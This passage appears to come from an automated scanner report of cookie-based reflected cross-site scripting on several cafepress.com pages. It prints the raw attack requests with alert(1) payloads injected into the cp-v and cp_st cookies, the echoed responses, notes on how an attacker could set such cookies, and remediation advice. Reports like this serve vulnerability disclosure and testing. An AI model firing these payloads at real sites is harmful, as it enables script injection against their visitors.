__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAc29af"-alert(1)-"a5c8b14505 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 71897 Date: Sun, 26 Dec 2010 13:47:53 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71897 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc29af"-alert(1)-"a5c8b14505 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.127. http://www.cafepress.com/make/personalized-gifts [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/personalized-gifts
Issue detail
The value of the cp_st cookie is copied into a JavaScript string literal delimited by single quotation marks. The payload 73b12</script><script>alert(1)</script>ef50e1d8ced was submitted in the cp_st cookie and was echoed unmodified in the application's response. The payload does not need to close the string literal: the HTML parser ends a script element at the first </script> it encounters, irrespective of JavaScript quoting, so the <script>alert(1)</script> that follows is parsed as a new script element and executes. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data is submitted in a cookie rather than in a URL or form parameter, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set the cp_st cookie in the victim's browser. The Set-Cookie headers in the response scope cookies to domain=cafepress.com, and a cookie with that scope can be written by any host under cafepress.com, so an injection flaw on a sibling subdomain, or an active attacker on the plain-HTTP connection used here, would supply that means. This requirement considerably reduces the impact of the vulnerability.
Remediation detail
Echoing user-controllable data inside a script block is inherently dangerous and hard to defend reliably, so where possible the application should not place user-supplied values in a script context at all: emit them HTML-encoded into an attribute or a data element and read them from the DOM instead. Where a value must be written into a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emission (or serialise it with a JSON encoder that also escapes < and /), so that neither the string delimiter nor the sequence </script can be reconstructed from the data. HTML-entity encoding is not a substitute in this context, because the browser does not decode entities inside script content.
Request
GET /make/personalized-gifts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=73b12</script><script>alert(1)</script>ef50e1d8ced ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 71920 Date: Sun, 26 Dec 2010 13:47:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71920 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '73b12</script><script>alert(1)</script>ef50e1d8ced ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.128. http://www.cafepress.com/make/personalized-ornaments [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/personalized-ornaments
Issue detail
The value of the cp-v cookie is copied into a JavaScript string literal delimited by double quotation marks. The payload 5ac27"-alert(1)-"47b4bca4067 was submitted in the cp-v cookie and was echoed unmodified in the application's response. The embedded double quote closes the string literal, and the subtraction operators on either side of alert(1) keep the statement syntactically valid (the assignment becomes s.eVar30 = "...5ac27" - alert(1) - "47b4bca4067 ";), so the injected call runs when the inline script executes. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data is submitted in a cookie rather than in a URL or form parameter, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set the cp-v cookie in the victim's browser. The Set-Cookie headers in the response scope cookies to domain=cafepress.com, and a cookie with that scope can be written by any host under cafepress.com, so an injection flaw on a sibling subdomain, or an active attacker on the plain-HTTP connection used here, would supply that means. This requirement considerably reduces the impact of the vulnerability.
Remediation detail
Echoing user-controllable data inside a script block is inherently dangerous and hard to defend reliably, so where possible the application should not place user-supplied values in a script context at all: emit them HTML-encoded into an attribute or a data element and read them from the DOM instead. Where a value must be written into a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emission (or serialise it with a JSON encoder that also escapes < and /), so that neither the string delimiter nor the sequence </script can be reconstructed from the data. HTML-entity encoding is not a substitute in this context, because the browser does not decode entities inside script content.
Request
GET /make/personalized-ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA5ac27"-alert(1)-"47b4bca4067 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 54274 Date: Sun, 26 Dec 2010 13:48:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54274 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA5ac27"-alert(1)-"47b4bca4067 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.129. http://www.cafepress.com/make/personalized-ornaments [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/personalized-ornaments
Issue detail
The value of the cp_st cookie is copied into a JavaScript string literal delimited by single quotation marks. The payload 4d007</script><script>alert(1)</script>1409bed2e4a was submitted in the cp_st cookie and was echoed unmodified in the application's response. The payload does not need to close the string literal: the HTML parser ends a script element at the first </script> it encounters, irrespective of JavaScript quoting, so the <script>alert(1)</script> that follows is parsed as a new script element and executes. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the injected data is submitted in a cookie rather than in a URL or form parameter, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set the cp_st cookie in the victim's browser. The Set-Cookie headers in the response scope cookies to domain=cafepress.com, and a cookie with that scope can be written by any host under cafepress.com, so an injection flaw on a sibling subdomain, or an active attacker on the plain-HTTP connection used here, would supply that means. This requirement considerably reduces the impact of the vulnerability.
Remediation detail
Echoing user-controllable data inside a script block is inherently dangerous and hard to defend reliably, so where possible the application should not place user-supplied values in a script context at all: emit them HTML-encoded into an attribute or a data element and read them from the DOM instead. Where a value must be written into a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emission (or serialise it with a JSON encoder that also escapes < and /), so that neither the string delimiter nor the sequence </script can be reconstructed from the data. HTML-entity encoding is not a substitute in this context, because the browser does not decode entities inside script content.
Request
GET /make/personalized-ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4d007</script><script>alert(1)</script>1409bed2e4a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 54293 Date: Sun, 26 Dec 2010 13:48:24 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54293 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '4d007</script><script>alert(1)</script>1409bed2e4a ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.130. http://www.cafepress.com/make/photo-on-canvas [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/photo-on-canvas
Issue detail
The value of the cp-v cookie is copied into a JavaScript string literal delimited by double quotation marks. The payload 390f6"-alert(1)-"cf485b1a7be was submitted in the cp-v cookie and was echoed unmodified in the application's response. The embedded double quote closes the string literal, and the subtraction operators on either side of alert(1) keep the statement syntactically valid (the assignment becomes s.eVar30 = "...390f6" - alert(1) - "cf485b1a7be ";), so the injected call runs when the inline script executes. This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input; the redirect must be followed for the attack to succeed, which a browser does automatically, and the cookie continues to be sent provided the redirect target stays within the cookie's scope. Because the injected data is submitted in a cookie rather than in a URL or form parameter, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set the cp-v cookie in the victim's browser. The Set-Cookie headers in the response scope cookies to domain=cafepress.com, and a cookie with that scope can be written by any host under cafepress.com, so an injection flaw on a sibling subdomain, or an active attacker on the plain-HTTP connection used here, would supply that means. This requirement considerably reduces the impact of the vulnerability.
Remediation detail
Echoing user-controllable data inside a script block is inherently dangerous and hard to defend reliably, so where possible the application should not place user-supplied values in a script context at all: emit them HTML-encoded into an attribute or a data element and read them from the DOM instead. Where a value must be written into a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emission (or serialise it with a JSON encoder that also escapes < and /), so that neither the string delimiter nor the sequence </script can be reconstructed from the data. HTML-entity encoding is not a substitute in this context, because the browser does not decode entities inside script content.
Request
GET /make/photo-on-canvas HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA390f6"-alert(1)-"cf485b1a7be ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 64044 Date: Sun, 26 Dec 2010 13:47:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 64044 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA390f6"-alert(1)-"cf485b1a7be "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.131. http://www.cafepress.com/make/photo-on-canvas [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/photo-on-canvas
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa097</script><script>alert(1)</script>ac2f65e7c84 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/photo-on-canvas HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=aa097</script><script>alert(1)</script>ac2f65e7c84 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; 